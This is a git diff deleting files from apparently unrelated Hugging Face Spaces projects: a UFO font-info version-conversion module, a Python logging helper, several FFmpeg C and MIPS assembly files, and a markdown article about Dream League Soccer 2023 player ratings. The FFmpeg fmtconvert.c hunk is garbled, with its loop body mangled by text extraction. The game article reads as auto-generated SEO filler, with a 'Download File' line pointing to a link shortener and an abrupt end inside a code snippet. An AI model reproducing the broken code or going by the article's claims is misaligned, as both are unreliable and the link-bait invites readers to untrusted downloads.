"woffMinorVersion": dict( - type=int, valueValidator=genericNonNegativeIntValidator - ), - "woffMetadataUniqueID": dict( - type=dict, valueValidator=fontInfoWOFFMetadataUniqueIDValidator - ), - "woffMetadataVendor": dict( - type=dict, valueValidator=fontInfoWOFFMetadataVendorValidator - ), - "woffMetadataCredits": dict( - type=dict, valueValidator=fontInfoWOFFMetadataCreditsValidator - ), - "woffMetadataDescription": dict( - type=dict, valueValidator=fontInfoWOFFMetadataDescriptionValidator - ), - "woffMetadataLicense": dict( - type=dict, valueValidator=fontInfoWOFFMetadataLicenseValidator - ), - "woffMetadataCopyright": dict( - type=dict, valueValidator=fontInfoWOFFMetadataCopyrightValidator - ), - "woffMetadataTrademark": dict( - type=dict, valueValidator=fontInfoWOFFMetadataTrademarkValidator - ), - "woffMetadataLicensee": dict( - type=dict, valueValidator=fontInfoWOFFMetadataLicenseeValidator - ), - "woffMetadataExtensions": dict( - type=list, valueValidator=fontInfoWOFFMetadataExtensionsValidator - ), - "guidelines": dict(type=list, valueValidator=guidelinesValidator), - } -) -fontInfoAttributesVersion3 = set(fontInfoAttributesVersion3ValueData.keys()) - -# insert the type validator for all attrs that -# have no defined validator. -for attr, dataDict in list(fontInfoAttributesVersion2ValueData.items()): - if "valueValidator" not in dataDict: - dataDict["valueValidator"] = genericTypeValidator - -for attr, dataDict in list(fontInfoAttributesVersion3ValueData.items()): - if "valueValidator" not in dataDict: - dataDict["valueValidator"] = genericTypeValidator - -# Version Conversion Support -# These are used from converting from version 1 -# to version 2 or vice-versa. 
- - -def _flipDict(d): - flipped = {} - for key, value in list(d.items()): - flipped[value] = key - return flipped - - -fontInfoAttributesVersion1To2 = { - "menuName": "styleMapFamilyName", - "designer": "openTypeNameDesigner", - "designerURL": "openTypeNameDesignerURL", - "createdBy": "openTypeNameManufacturer", - "vendorURL": "openTypeNameManufacturerURL", - "license": "openTypeNameLicense", - "licenseURL": "openTypeNameLicenseURL", - "ttVersion": "openTypeNameVersion", - "ttUniqueID": "openTypeNameUniqueID", - "notice": "openTypeNameDescription", - "otFamilyName": "openTypeNamePreferredFamilyName", - "otStyleName": "openTypeNamePreferredSubfamilyName", - "otMacName": "openTypeNameCompatibleFullName", - "weightName": "postscriptWeightName", - "weightValue": "openTypeOS2WeightClass", - "ttVendor": "openTypeOS2VendorID", - "uniqueID": "postscriptUniqueID", - "fontName": "postscriptFontName", - "fondID": "macintoshFONDFamilyID", - "fondName": "macintoshFONDName", - "defaultWidth": "postscriptDefaultWidthX", - "slantAngle": "postscriptSlantAngle", - "fullName": "postscriptFullName", - # require special value conversion - "fontStyle": "styleMapStyleName", - "widthName": "openTypeOS2WidthClass", - "msCharSet": "postscriptWindowsCharacterSet", -} -fontInfoAttributesVersion2To1 = _flipDict(fontInfoAttributesVersion1To2) -deprecatedFontInfoAttributesVersion2 = set(fontInfoAttributesVersion1To2.keys()) - -_fontStyle1To2 = {64: "regular", 1: "italic", 32: "bold", 33: "bold italic"} -_fontStyle2To1 = _flipDict(_fontStyle1To2) -# Some UFO 1 files have 0 -_fontStyle1To2[0] = "regular" - -_widthName1To2 = { - "Ultra-condensed": 1, - "Extra-condensed": 2, - "Condensed": 3, - "Semi-condensed": 4, - "Medium (normal)": 5, - "Semi-expanded": 6, - "Expanded": 7, - "Extra-expanded": 8, - "Ultra-expanded": 9, -} -_widthName2To1 = _flipDict(_widthName1To2) -# FontLab's default width value is "Normal". -# Many format version 1 UFOs will have this. -_widthName1To2["Normal"] = 5 -# FontLab has an "All" width value. In UFO 1 -# move this up to "Normal". -_widthName1To2["All"] = 5 -# "medium" appears in a lot of UFO 1 files. -_widthName1To2["medium"] = 5 -# "Medium" appears in a lot of UFO 1 files. -_widthName1To2["Medium"] = 5 - -_msCharSet1To2 = { - 0: 1, - 1: 2, - 2: 3, - 77: 4, - 128: 5, - 129: 6, - 130: 7, - 134: 8, - 136: 9, - 161: 10, - 162: 11, - 163: 12, - 177: 13, - 178: 14, - 186: 15, - 200: 16, - 204: 17, - 222: 18, - 238: 19, - 255: 20, -} -_msCharSet2To1 = _flipDict(_msCharSet1To2) - -# 1 <-> 2 - - -def convertFontInfoValueForAttributeFromVersion1ToVersion2(attr, value): - """ - Convert value from version 1 to version 2 format. - Returns the new attribute name and the converted value. - If the value is None, None will be returned for the new value. - """ - # convert floats to ints if possible - if isinstance(value, float): - if int(value) == value: - value = int(value) - if value is not None: - if attr == "fontStyle": - v = _fontStyle1To2.get(value) - if v is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {attr}." - ) - value = v - elif attr == "widthName": - v = _widthName1To2.get(value) - if v is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {attr}." - ) - value = v - elif attr == "msCharSet": - v = _msCharSet1To2.get(value) - if v is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {attr}." 
- ) - value = v - attr = fontInfoAttributesVersion1To2.get(attr, attr) - return attr, value - - -def convertFontInfoValueForAttributeFromVersion2ToVersion1(attr, value): - """ - Convert value from version 2 to version 1 format. - Returns the new attribute name and the converted value. - If the value is None, None will be returned for the new value. - """ - if value is not None: - if attr == "styleMapStyleName": - value = _fontStyle2To1.get(value) - elif attr == "openTypeOS2WidthClass": - value = _widthName2To1.get(value) - elif attr == "postscriptWindowsCharacterSet": - value = _msCharSet2To1.get(value) - attr = fontInfoAttributesVersion2To1.get(attr, attr) - return attr, value - - -def _convertFontInfoDataVersion1ToVersion2(data): - converted = {} - for attr, value in list(data.items()): - # FontLab gives -1 for the weightValue - # for fonts wil no defined value. Many - # format version 1 UFOs will have this. - if attr == "weightValue" and value == -1: - continue - newAttr, newValue = convertFontInfoValueForAttributeFromVersion1ToVersion2( - attr, value - ) - # skip if the attribute is not part of version 2 - if newAttr not in fontInfoAttributesVersion2: - continue - # catch values that can't be converted - if value is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {newAttr}." - ) - # store - converted[newAttr] = newValue - return converted - - -def _convertFontInfoDataVersion2ToVersion1(data): - converted = {} - for attr, value in list(data.items()): - newAttr, newValue = convertFontInfoValueForAttributeFromVersion2ToVersion1( - attr, value - ) - # only take attributes that are registered for version 1 - if newAttr not in fontInfoAttributesVersion1: - continue - # catch values that can't be converted - if value is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {newAttr}." - ) - # store - converted[newAttr] = newValue - return converted - - -# 2 <-> 3 - -_ufo2To3NonNegativeInt = { - "versionMinor", - "openTypeHeadLowestRecPPEM", - "openTypeOS2WinAscent", - "openTypeOS2WinDescent", -} -_ufo2To3NonNegativeIntOrFloat = { - "unitsPerEm", -} -_ufo2To3FloatToInt = { - "openTypeHeadLowestRecPPEM", - "openTypeHheaAscender", - "openTypeHheaDescender", - "openTypeHheaLineGap", - "openTypeHheaCaretOffset", - "openTypeOS2TypoAscender", - "openTypeOS2TypoDescender", - "openTypeOS2TypoLineGap", - "openTypeOS2WinAscent", - "openTypeOS2WinDescent", - "openTypeOS2SubscriptXSize", - "openTypeOS2SubscriptYSize", - "openTypeOS2SubscriptXOffset", - "openTypeOS2SubscriptYOffset", - "openTypeOS2SuperscriptXSize", - "openTypeOS2SuperscriptYSize", - "openTypeOS2SuperscriptXOffset", - "openTypeOS2SuperscriptYOffset", - "openTypeOS2StrikeoutSize", - "openTypeOS2StrikeoutPosition", - "openTypeVheaVertTypoAscender", - "openTypeVheaVertTypoDescender", - "openTypeVheaVertTypoLineGap", - "openTypeVheaCaretOffset", -} - - -def convertFontInfoValueForAttributeFromVersion2ToVersion3(attr, value): - """ - Convert value from version 2 to version 3 format. - Returns the new attribute name and the converted value. - If the value is None, None will be returned for the new value. - """ - if attr in _ufo2To3FloatToInt: - try: - value = round(value) - except (ValueError, TypeError): - raise UFOLibError("Could not convert value for %s." % attr) - if attr in _ufo2To3NonNegativeInt: - try: - value = int(abs(value)) - except (ValueError, TypeError): - raise UFOLibError("Could not convert value for %s." 
% attr) - elif attr in _ufo2To3NonNegativeIntOrFloat: - try: - v = float(abs(value)) - except (ValueError, TypeError): - raise UFOLibError("Could not convert value for %s." % attr) - if v == int(v): - v = int(v) - if v != value: - value = v - return attr, value - - -def convertFontInfoValueForAttributeFromVersion3ToVersion2(attr, value): - """ - Convert value from version 3 to version 2 format. - Returns the new attribute name and the converted value. - If the value is None, None will be returned for the new value. - """ - return attr, value - - -def _convertFontInfoDataVersion3ToVersion2(data): - converted = {} - for attr, value in list(data.items()): - newAttr, newValue = convertFontInfoValueForAttributeFromVersion3ToVersion2( - attr, value - ) - if newAttr not in fontInfoAttributesVersion2: - continue - converted[newAttr] = newValue - return converted - - -def _convertFontInfoDataVersion2ToVersion3(data): - converted = {} - for attr, value in list(data.items()): - attr, value = convertFontInfoValueForAttributeFromVersion2ToVersion3( - attr, value - ) - converted[attr] = value - return converted - - -if __name__ == "__main__": - import doctest - - doctest.testmod() diff --git a/spaces/codelion/Grounding_DINO_demo/groundingdino/util/logger.py b/spaces/codelion/Grounding_DINO_demo/groundingdino/util/logger.py deleted file mode 100644 index 18145f54c927abd59b95f3fa6e6da8002bc2ce97..0000000000000000000000000000000000000000 --- a/spaces/codelion/Grounding_DINO_demo/groundingdino/util/logger.py +++ /dev/null @@ -1,93 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -import functools -import logging -import os -import sys - -from termcolor import colored - - -class _ColorfulFormatter(logging.Formatter): - def __init__(self, *args, **kwargs): - self._root_name = kwargs.pop("root_name") + "." - self._abbrev_name = kwargs.pop("abbrev_name", "") - if len(self._abbrev_name): - self._abbrev_name = self._abbrev_name + "." - super(_ColorfulFormatter, self).__init__(*args, **kwargs) - - def formatMessage(self, record): - record.name = record.name.replace(self._root_name, self._abbrev_name) - log = super(_ColorfulFormatter, self).formatMessage(record) - if record.levelno == logging.WARNING: - prefix = colored("WARNING", "red", attrs=["blink"]) - elif record.levelno == logging.ERROR or record.levelno == logging.CRITICAL: - prefix = colored("ERROR", "red", attrs=["blink", "underline"]) - else: - return log - return prefix + " " + log - - -# so that calling setup_logger multiple times won't add many handlers -@functools.lru_cache() -def setup_logger(output=None, distributed_rank=0, *, color=True, name="imagenet", abbrev_name=None): - """ - Initialize the detectron2 logger and set its verbosity level to "INFO". - - Args: - output (str): a file name or a directory to save log. If None, will not save log file. - If ends with ".txt" or ".log", assumed to be a file name. - Otherwise, logs will be saved to `output/log.txt`. 
- name (str): the root module name of this logger - - Returns: - logging.Logger: a logger - """ - logger = logging.getLogger(name) - logger.setLevel(logging.DEBUG) - logger.propagate = False - - if abbrev_name is None: - abbrev_name = name - - plain_formatter = logging.Formatter( - "[%(asctime)s.%(msecs)03d]: %(message)s", datefmt="%m/%d %H:%M:%S" - ) - # stdout logging: master only - if distributed_rank == 0: - ch = logging.StreamHandler(stream=sys.stdout) - ch.setLevel(logging.DEBUG) - if color: - formatter = _ColorfulFormatter( - colored("[%(asctime)s.%(msecs)03d]: ", "green") + "%(message)s", - datefmt="%m/%d %H:%M:%S", - root_name=name, - abbrev_name=str(abbrev_name), - ) - else: - formatter = plain_formatter - ch.setFormatter(formatter) - logger.addHandler(ch) - - # file logging: all workers - if output is not None: - if output.endswith(".txt") or output.endswith(".log"): - filename = output - else: - filename = os.path.join(output, "log.txt") - if distributed_rank > 0: - filename = filename + f".rank{distributed_rank}" - os.makedirs(os.path.dirname(filename), exist_ok=True) - - fh = logging.StreamHandler(_cached_log_stream(filename)) - fh.setLevel(logging.DEBUG) - fh.setFormatter(plain_formatter) - logger.addHandler(fh) - - return logger - - -# cache the opened file object, so that different calls to `setup_logger` -# with the same file name can safely write to the same file. -@functools.lru_cache(maxsize=None) -def _cached_log_stream(filename): - return open(filename, "a") diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/blockdsp_init_neon.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/blockdsp_init_neon.c deleted file mode 100644 index 0600bc6e507967ab8f77cd8d25d37d4b57d61e8c..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/blockdsp_init_neon.c +++ /dev/null @@ -1,35 +0,0 @@ -/* - * ARM NEON optimised block operations - * Copyright (c) 2008 Mans Rullgard - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. 
- * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include - -#include "libavutil/attributes.h" -#include "libavcodec/blockdsp.h" -#include "blockdsp_arm.h" - -void ff_clear_block_neon(int16_t *block); -void ff_clear_blocks_neon(int16_t *blocks); - -av_cold void ff_blockdsp_init_neon(BlockDSPContext *c) -{ - c->clear_block = ff_clear_block_neon; - c->clear_blocks = ff_clear_blocks_neon; -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/fmtconvert.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/fmtconvert.c deleted file mode 100644 index d889e61aca037c4994edf648bda8aa14d5c3412e..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/fmtconvert.c +++ /dev/null @@ -1,63 +0,0 @@ -/* - * Format Conversion Utils - * Copyright (c) 2000, 2001 Fabrice Bellard - * Copyright (c) 2002-2004 Michael Niedermayer - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "config.h" -#include "libavutil/attributes.h" -#include "fmtconvert.h" - -static void int32_to_float_fmul_scalar_c(float *dst, const int32_t *src, - float mul, int len) -{ - int i; - for(i=0; iint32_to_float_fmul_scalar(&dst[i], &src[i], *mul++, 8); -} - -av_cold void ff_fmt_convert_init(FmtConvertContext *c) -{ - c->int32_to_float_fmul_scalar = int32_to_float_fmul_scalar_c; - c->int32_to_float_fmul_array8 = int32_to_float_fmul_array8_c; - -#if ARCH_AARCH64 - ff_fmt_convert_init_aarch64(c); -#elif ARCH_ARM - ff_fmt_convert_init_arm(c); -#elif ARCH_PPC - ff_fmt_convert_init_ppc(c); -#elif ARCH_RISCV - ff_fmt_convert_init_riscv(c); -#elif ARCH_X86 - ff_fmt_convert_init_x86(c); -#endif -#if HAVE_MIPSFPU - ff_fmt_convert_init_mips(c); -#endif -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mdct_float.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mdct_float.c deleted file mode 100644 index 3d3d3a554828a9272ea6badb0cfba09e45644d86..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mdct_float.c +++ /dev/null @@ -1,20 +0,0 @@ -/* - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. 
- * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#define FFT_FLOAT 1 -#include "mdct_template.c" diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/compute_antialias_float.h b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/compute_antialias_float.h deleted file mode 100644 index 633eb9589d8ca214325c31e4e1e1958f66a256f6..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/compute_antialias_float.h +++ /dev/null @@ -1,186 +0,0 @@ -/* - * Copyright (c) 2012 - * MIPS Technologies, Inc., California. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * 1. Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * 2. Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * 3. Neither the name of the MIPS Technologies, Inc., nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE MIPS TECHNOLOGIES, INC. ``AS IS'' AND - * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE MIPS TECHNOLOGIES, INC. BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS - * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT - * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY - * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF - * SUCH DAMAGE. - * - * Author: Bojan Zivkovic (bojan@mips.com) - * - * Compute antialias function optimised for MIPS floating-point architecture - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. 
- * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -/** - * @file - * Reference: libavcodec/mpegaudiodec.c - */ - -#ifndef AVCODEC_MIPS_COMPUTE_ANTIALIAS_FLOAT_H -#define AVCODEC_MIPS_COMPUTE_ANTIALIAS_FLOAT_H - -#include "libavutil/mips/asmdefs.h" - -#if HAVE_INLINE_ASM -#if !HAVE_MIPS32R6 && !HAVE_MIPS64R6 -static void compute_antialias_mips_float(MPADecodeContext *s, - GranuleDef *g) -{ - float *ptr, *ptr_end; - const float *csa = &csa_table[0][0]; - /* temporary variables */ - float in1, in2, in3, in4, in5, in6, in7, in8; - float out1, out2, out3, out4; - - ptr = g->sb_hybrid + 18; - /* we antialias only "long" bands */ - if (g->block_type == 2) { - if (!g->switch_point) - return; - /* XXX: check this for 8000Hz case */ - ptr_end = ptr + 18; - } else { - ptr_end = ptr + 558; - } - - /** - * instructions are scheduled to minimize pipeline stall. - */ - - __asm__ volatile ( - "compute_antialias_float_loop%=: \t\n" - "lwc1 %[in1], -1*4(%[ptr]) \t\n" - "lwc1 %[in2], 0(%[csa]) \t\n" - "lwc1 %[in3], 1*4(%[csa]) \t\n" - "lwc1 %[in4], 0(%[ptr]) \t\n" - "lwc1 %[in5], -2*4(%[ptr]) \t\n" - "lwc1 %[in6], 4*4(%[csa]) \t\n" - "mul.s %[out1], %[in1], %[in2] \t\n" - "mul.s %[out2], %[in1], %[in3] \t\n" - "lwc1 %[in7], 5*4(%[csa]) \t\n" - "lwc1 %[in8], 1*4(%[ptr]) \t\n" - "nmsub.s %[out1], %[out1], %[in3], %[in4] \t\n" - "madd.s %[out2], %[out2], %[in2], %[in4] \t\n" - "mul.s %[out3], %[in5], %[in6] \t\n" - "mul.s %[out4], %[in5], %[in7] \t\n" - "lwc1 %[in1], -3*4(%[ptr]) \t\n" - "swc1 %[out1], -1*4(%[ptr]) \t\n" - "swc1 %[out2], 0(%[ptr]) \t\n" - "nmsub.s %[out3], %[out3], %[in7], %[in8] \t\n" - "madd.s %[out4], %[out4], %[in6], %[in8] \t\n" - "lwc1 %[in2], 8*4(%[csa]) \t\n" - "swc1 %[out3], -2*4(%[ptr]) \t\n" - "swc1 %[out4], 1*4(%[ptr]) \t\n" - "lwc1 %[in3], 9*4(%[csa]) \t\n" - "lwc1 %[in4], 2*4(%[ptr]) \t\n" - "mul.s %[out1], %[in1], %[in2] \t\n" - "lwc1 %[in5], -4*4(%[ptr]) \t\n" - "lwc1 %[in6], 12*4(%[csa]) \t\n" - "mul.s %[out2], %[in1], %[in3] \t\n" - "lwc1 %[in7], 13*4(%[csa]) \t\n" - "nmsub.s %[out1], %[out1], %[in3], %[in4] \t\n" - "lwc1 %[in8], 3*4(%[ptr]) \t\n" - "mul.s %[out3], %[in5], %[in6] \t\n" - "madd.s %[out2], %[out2], %[in2], %[in4] \t\n" - "mul.s %[out4], %[in5], %[in7] \t\n" - "swc1 %[out1], -3*4(%[ptr]) \t\n" - "lwc1 %[in1], -5*4(%[ptr]) \t\n" - "nmsub.s %[out3], %[out3], %[in7], %[in8] \t\n" - "swc1 %[out2], 2*4(%[ptr]) \t\n" - "madd.s %[out4], %[out4], %[in6], %[in8] \t\n" - "lwc1 %[in2], 16*4(%[csa]) \t\n" - "lwc1 %[in3], 17*4(%[csa]) \t\n" - "swc1 %[out3], -4*4(%[ptr]) \t\n" - "lwc1 %[in4], 4*4(%[ptr]) \t\n" - "swc1 %[out4], 3*4(%[ptr]) \t\n" - "mul.s %[out1], %[in1], %[in2] \t\n" - "mul.s %[out2], %[in1], %[in3] \t\n" - "lwc1 %[in5], -6*4(%[ptr]) \t\n" - "lwc1 %[in6], 20*4(%[csa]) \t\n" - "lwc1 %[in7], 21*4(%[csa]) \t\n" - "nmsub.s %[out1], %[out1], %[in3], %[in4] \t\n" - "madd.s %[out2], %[out2], %[in2], %[in4] \t\n" - "lwc1 %[in8], 5*4(%[ptr]) \t\n" - "mul.s %[out3], %[in5], %[in6] \t\n" - "mul.s %[out4], %[in5], %[in7] \t\n" - "swc1 %[out1], -5*4(%[ptr]) \t\n" - "swc1 %[out2], 4*4(%[ptr]) \t\n" - "lwc1 %[in1], -7*4(%[ptr]) \t\n" - "nmsub.s %[out3], %[out3], %[in7], %[in8] \t\n" - "madd.s %[out4], %[out4], %[in6], %[in8] \t\n" - "lwc1 %[in2], 24*4(%[csa]) \t\n" - "lwc1 %[in3], 25*4(%[csa]) \t\n" - "lwc1 %[in4], 6*4(%[ptr]) \t\n" - "swc1 %[out3], -6*4(%[ptr]) \t\n" - "swc1 %[out4], 5*4(%[ptr]) \t\n" 
- "mul.s %[out1], %[in1], %[in2] \t\n" - "lwc1 %[in5], -8*4(%[ptr]) \t\n" - "mul.s %[out2], %[in1], %[in3] \t\n" - "lwc1 %[in6], 28*4(%[csa]) \t\n" - "lwc1 %[in7], 29*4(%[csa]) \t\n" - "nmsub.s %[out1], %[out1], %[in3], %[in4] \t\n" - "lwc1 %[in8], 7*4(%[ptr]) \t\n" - "madd.s %[out2], %[out2], %[in2], %[in4] \t\n" - "mul.s %[out3], %[in5], %[in6] \t\n" - "mul.s %[out4], %[in5], %[in7] \t\n" - "swc1 %[out1], -7*4(%[ptr]) \t\n" - "swc1 %[out2], 6*4(%[ptr]) \t\n" - PTR_ADDIU "%[ptr],%[ptr], 72 \t\n" - "nmsub.s %[out3], %[out3], %[in7], %[in8] \t\n" - "madd.s %[out4], %[out4], %[in6], %[in8] \t\n" - "swc1 %[out3], -26*4(%[ptr]) \t\n" - "swc1 %[out4], -11*4(%[ptr]) \t\n" - "bne %[ptr], %[ptr_end], compute_antialias_float_loop%= \t\n" - - : [ptr] "+r" (ptr), - [in1] "=&f" (in1), [in2] "=&f" (in2), - [in3] "=&f" (in3), [in4] "=&f" (in4), - [in5] "=&f" (in5), [in6] "=&f" (in6), - [in7] "=&f" (in7), [in8] "=&f" (in8), - [out1] "=&f" (out1), [out2] "=&f" (out2), - [out3] "=&f" (out3), [out4] "=&f" (out4) - : [csa] "r" (csa), [ptr_end] "r" (ptr_end) - : "memory" - ); -} -#define compute_antialias compute_antialias_mips_float -#endif /* !HAVE_MIPS32R6 && !HAVE_MIPS64R6 */ -#endif /* HAVE_INLINE_ASM */ - -#endif /* AVCODEC_MIPS_COMPUTE_ANTIALIAS_FLOAT_H */ diff --git a/spaces/congsaPfin/Manga-OCR/logs/DLS 23 Player Ratings Who are the Best and Worst Legends Rares and Commons?.md b/spaces/congsaPfin/Manga-OCR/logs/DLS 23 Player Ratings Who are the Best and Worst Legends Rares and Commons?.md deleted file mode 100644 index 1cee66812725fb970bb93942bec6e956fe913310..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/DLS 23 Player Ratings Who are the Best and Worst Legends Rares and Commons?.md +++ /dev/null @@ -1,116 +0,0 @@ -
      -

      DLS 2023 Player Ratings: How to Build Your Dream Team

      -

      If you are a fan of soccer games, you might have heard of Dream League Soccer 2023, or DLS 2023 for short. This is one of the most popular and realistic soccer games on mobile devices, with over 100 million downloads on Google Play Store and App Store. In this article, we will show you how to use player ratings to build your dream team in DLS 2023, as well as how to play the game and win matches. Let's get started!

      -

      dls 2023 player ratings


      Download File ✯✯✯ https://urlca.com/2uOfvj



      -

      Introduction

      -

      What is DLS 2023 and why is it popular?

      -

Dream League Soccer 2023 is a soccer simulation game developed by First Touch Games, a UK-based studio that specializes in sports games. The game allows you to create and manage your own soccer club, from signing players and upgrading facilities, to playing matches and competing in tournaments. You can choose from over 4,000 FIFPRO™ licensed players, including superstars like Kevin De Bruyne, Achraf Hakimi, Lionel Messi, Cristiano Ronaldo, Kylian Mbappe, Robert Lewandowski, and more. You can also customize your team's kit, logo, and formation, as well as import your own creations.

      -

One of the reasons DLS 2023 is so popular is its realistic and immersive gameplay. The game features full 3D motion-captured kicks, tackles, celebrations, and goalkeeper saves, as well as immersive and exciting match commentary. The game also uses improved AI to make the matches more challenging and fun. Moreover, the game has a Dream League Live mode that lets you play against other players from across the globe in real time. You can also take part in regular seasons and events to win unrivalled rewards.

      -

      What are player ratings and why are they important?

      -

      Player ratings are numerical values that indicate how good a player is in different aspects of the game. Each player has an overall rating (OVR) that ranges from 1 to 100, as well as ratings for six attributes: speed (SPE), shooting (SHO), passing (PAS), dribbling (DRI), strength (STR), and defending (DEF). The higher the rating, the better the player performs on the field.

      -
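To make the comparison concrete, here is a minimal sketch of how you could represent these ratings and rank players for a given role. The game has no public API, so the data structure, the sample values, and the attribute weights below are purely illustrative assumptions.

```python
# Illustrative only: DLS 2023 has no public API. The records and the striker
# weighting below are made-up examples of the OVR/SPE/SHO/PAS/DRI/STR/DEF idea.
from dataclasses import dataclass

@dataclass
class Player:
    name: str
    ovr: int   # overall rating, 1-100
    spe: int   # speed
    sho: int   # shooting
    pas: int   # passing
    dri: int   # dribbling
    str_: int  # strength ("str" would shadow the built-in name)
    def_: int  # defending ("def" is a Python keyword)

def striker_score(p: Player) -> float:
    # Hypothetical weighting: a striker cares most about shooting and speed.
    return 0.4 * p.sho + 0.3 * p.spe + 0.2 * p.dri + 0.1 * p.pas

squad = [
    Player("Forward A", ovr=88, spe=90, sho=89, pas=80, dri=87, str_=75, def_=40),
    Player("Forward B", ovr=86, spe=94, sho=82, pas=78, dri=90, str_=70, def_=35),
]

# Rank the candidates for the striker slot, best first.
for p in sorted(squad, key=striker_score, reverse=True):
    print(f"{p.name}: {striker_score(p):.1f}")
```

The same idea works for any position: change the weights to favour defending and strength for a centre-back, or passing and dribbling for a midfielder.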


      -

Player ratings are important because they affect how your team plays and how you can win matches. For example, if you have a player with a high speed rating, he can run faster than other players and create more chances for scoring or assisting. If you have a player with a high shooting rating, he can shoot more accurately and powerfully than other players and score more goals. If you have a player with a high defending rating, he can tackle more effectively and prevent your opponents from scoring.

      -

Therefore, it is essential to pay attention to player ratings when building your dream team.

      How to find the best players for your team

      -

      Use the DLS 23 Players Database to compare stats and ratings

      -

      One of the easiest ways to find the best players for your team is to use the DLS 23 Players Database, a website that provides detailed information about all the players in the game. You can search for players by name, position, nationality, club, league, or rating. You can also sort and filter the results by various criteria, such as OVR, SPE, SHO, PAS, DRI, STR, or DEF. You can also view the player's profile, which shows his age, height, weight, preferred foot, and skills.

      -

      The DLS 23 Players Database is a useful tool to compare different players and see their strengths and weaknesses. For example, you can compare Messi and Ronaldo and see who has higher ratings in different attributes. You can also compare players from different leagues and see who are the best in each category. You can also find hidden gems and underrated players who have high potential and low cost.

      -
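If you copy a few entries from the database into a spreadsheet, a handful of lines of code can run the same kind of comparison offline. The sketch below assumes a hand-made players.csv with name, position, and rating columns; the file and its column names are assumptions for illustration, not something the website provides.

```python
# Assumed input: a hand-made players.csv with the columns
# name,position,ovr,spe,sho,pas,dri,str,def (values copied by hand from the database).
import csv

with open("players.csv", newline="", encoding="utf-8") as f:
    players = list(csv.DictReader(f))

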